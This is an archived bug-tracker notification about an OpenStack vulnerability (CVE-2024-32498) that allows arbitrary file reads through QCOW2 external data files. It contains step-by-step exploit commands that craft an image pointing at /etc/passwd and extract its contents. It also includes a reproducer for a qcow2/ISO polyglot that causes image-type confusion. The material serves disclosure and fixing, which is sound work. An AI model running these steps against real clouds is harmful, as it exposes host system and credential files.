[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
Felix Huettner
2059809 at bugs.launchpad.net
Thu Jul 4 08:18:29 UTC 2024
Hi everyone,
we probably have found an additional regression by this fix when using openstack server resuce with a ISO file.
Reproduce:
1. Create a image with a ISO file and disk_format iso
2. Resuce (create probably also affected) a server using this image.
This raises "Image not in a supported format" in
do_image_deep_inspection as we do not have a iso format inspector.
When implementing this inspector you can use the reference from here: http://wiki.osdev.org/ISO_9660
Most probably the following can be used for identification:
$ xxd -s 0x8001 -l 5 orig.iso
00008001: 4344 3030 31 CD001
When implementing this inspector please keep in mind that the first 32kb of a iso file are not actually part of the iso file itself, but free for other things to use: http://wiki.osdev.org/ISO_9660#System_Area
This can be used for image type confusion if you upload an iso file where the first 32kb are a qcow2 header. So the inspector for iso does not only need to check that it is a valid iso file, but also that the system area does not contain any other file headers.
Reproducer for this issue:
$ mkisofs -o orig.iso /etc/resolv.conf
$ qemu-img create orig.qcow2 -f qcow2 64M
$ dd if=orig.qcow2 of=outcome bs=32K count=1
$ dd if=orig.iso of=outcome bs=32K skip=1 seek=1
$ file outcome
outcome: ISO 9660 CD-ROM filesystem data 'CDROM'
$ qemu-img info outcome
image: outcome
file format: qcow2
virtual size: 64 MiB (67108864 bytes)
disk size: 348 KiB
cluster_size: 65536
Format specific information:
compat: 1.1
compression type: zlib
lazy refcounts: false
refcount bits: 16
corrupt: false
extended l2: false
Child node '/file':
filename: outcome
protocol type: file
file length: 348 KiB (356352 bytes)
disk size: 348 KiB
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809
Title:
[OSSA-2024-001] Arbitrary file access through QCOW2 external data file
(CVE-2024-32498)
Status in Cinder:
Fix Released
Status in Ubuntu Cloud Archive:
Fix Committed
Status in Ubuntu Cloud Archive antelope series:
Fix Committed
Status in Ubuntu Cloud Archive bobcat series:
Fix Committed
Status in Ubuntu Cloud Archive caracal series:
Fix Committed
Status in Ubuntu Cloud Archive ussuri series:
Fix Committed
Status in Ubuntu Cloud Archive yoga series:
Fix Committed
Status in Glance:
In Progress
Status in OpenStack Compute (nova):
Fix Released
Status in OpenStack Security Advisory:
Fix Released
Bug description:
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list